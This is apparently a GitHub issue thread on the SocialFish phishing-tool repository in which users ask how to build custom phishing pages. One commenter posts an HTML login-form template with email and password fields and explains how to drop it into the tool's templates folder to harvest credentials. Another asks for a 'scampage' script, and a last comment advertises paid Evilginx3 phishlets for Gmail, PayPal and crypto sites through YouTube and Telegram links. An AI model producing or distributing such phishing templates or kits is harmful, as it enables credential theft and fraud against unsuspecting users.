### ISSUE TITLE
How can i make a custom website on blackeye can somoene help me with this

### ISSUE THREAD

**Issue by RozequartzD** [UndeadSec/SocialFish#356]

**Comment by kcash07** [comment]
Have you gotten help because i will like to know as well

**Comment by franklintimoteo** [comment]
```
<html>
<head></head>
<body>
	<form action="/login" method="POST">
	    <label>Email Address</label>
	    <input type="email" name="email" placeholder="Email" autocomplete="off">
	    <label>Password</label>
	    <input type="password" name="password" placeholder="Password" autocomplete="off">
		<button type="submit">sign in</button>                                
	</form>
</body>
</html>
```

Any website at socialfish need have: 1 form(POST) with 2 input. Named: email and password. 
Form post to /login
input name: email
input name: password

After put in ../templates

**Comment by kcash07** [comment]
Nice

**Comment by kcash07** [comment]
Nice and if you can help me out with a little script of scampage login

**Comment by ttinkywinky45** [comment]
**Hi 👽 ! If you are interested in ⚙️Advanced Phishing⚙️ and the ✨Evilginx3✨ tool then I offer you Google Gmail and Custom Phishlets (Paypal, Cryptos...) with a ✅Free Tutorial✅ which arrives if the 📈Telegram reaches 50 Subscribers📈
⏳ GOOGLE GMAIL PHISHLET 2024 WITH PROOF ⏳
 ->
⛔https://www.youtube.com/watch?v=nA47UknIE6A⛔
---
🔓 Ask your questions and a free tutorial from 50 subs on telegram !!!
->
📩https://t.me/Noremorse1011📩**

![evilginx_background](https://github.com/kgretzky/evilginx2/assets/144027798/0e448f68-ecdc-49a4-a4f4-23dbed7cb971)
